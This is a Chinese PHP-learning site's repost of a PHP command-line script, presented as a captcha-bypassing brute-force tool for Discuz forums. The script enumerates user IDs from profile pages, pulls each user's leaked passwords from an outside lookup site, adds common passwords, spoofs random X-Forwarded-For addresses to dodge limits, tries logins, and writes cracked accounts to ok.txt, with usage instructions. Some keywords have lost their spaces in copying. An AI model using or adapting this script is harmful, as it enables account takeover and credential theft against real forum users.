网站地图    收藏   

主页 > 入门引导 > 黑客攻防 >

Discuz爆破脚本无视验证码 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-15 15:00 作者: 阅读:

[导读] ?phpclassfuckdz{ publicfunctionsgk($user){ $a=file_get_contents(http: www soyun org cha_api php?so=$userauto=); $a=iconv(UTF-8, GB2312 IGNORE, $a);...

<?php

classfuckdz{

    publicfunctionsgk($user){

        $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");

        $a=iconv("UTF-8", "GB2312//IGNORE", $a);

        preg_match_all("/7%\">(.*)</isU",$a,$arr);

        unset($arr[0]);

        foreach($arras$key=>$r){

            return$r;

            }

    }

     

    publicfunctiongetuid($host,$uid){

            $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);

            $opts= array(   

            'http'=> array(   

            'method'=> 'GET',   

            'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",

            'timeout'=>15, ) 

            ); 

            $context= stream_context_create($opts); 

             $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid",false,$context);

            if(strpos($a,'charset=utf-8')){

            $a=iconv("UTF-8", "GB2312//IGNORE", $a);

             

            }

             

            if(preg_match("/<title>(.*)的个人/isU",$a,$arr)){

             

            $a=str_replace("\r","",trim($arr[1]));

            return$a=str_replace("\n","",$a);

            }else{

            returnfalse;

            }

             

    }

     

    publicfunctionis_pass($host,$user,$pass){

            $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);

            $opts= array(   

            'http'=> array(   

            'method'=> 'GET',   

            'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",

            'timeout'=>15, ) 

            ); 

              

            $context= stream_context_create($opts); 

             $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);



            if(strpos($a,"window.location.href")){

                returntrue;

            }else{

                returnfalse;

            }

     

    }

    publicfunctioncrack($host,$a,$b){

    $host=str_replace("http://","",$host);

    $host="http://".$host."/";

    for($vip=$a;$vip<=$b;$vip++){ 

         

        if(!($user=$this->getuid($host,$vip))){

         

         continue;

        }

        $pass=$this->sgk($user);

        array_push($pass,"123456");

        array_push($pass,"654321");

        array_push($pass,"123123");

        array_push($pass,"woaini");

        array_push($pass,"caonima");

        array_push($pass,"12345");

        array_push($pass,"12345789");

        array_push($pass,"5201314");

        array_push($pass,"1314520");

        array_push($pass,$user);

        array_push($pass,$user."123456");

        array_push($pass,"abc123");

        array_push($pass,$user."..");

         

            for($i=0;isset($pass[$i]);$i++){ 

                echo"\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";

                if($this->is_pass($host,$user,$pass[$i])){

                        echo"爆破成功!\r\n--------------------";

                        file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);

                        break;

                         

                    }else{

                        echo"爆破失败";

                    }

                 

  

                } 

      

  

  

        }

    }

     

     

}

$f=newfuckdz();

error_reporting(0);

set_time_limit(0);

if(empty($argv[1])){

print_r("

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   

      开始爆破:php.exe $argv[0] 网址 起始uid 结束uid 

      示例: php.exe $argv[0] http://phpinfo.me/ 1 255

      结果保存在ok.txt里



      Blog:http://phpinfo.me

     

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   \n\n\n

");

}else{

if(!empty($argv[1])){

  

    $f->crack($argv[1],$argv[2],$argv[3]);

  }else{

    echo"逗比";

 }

 }

 ?>



 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论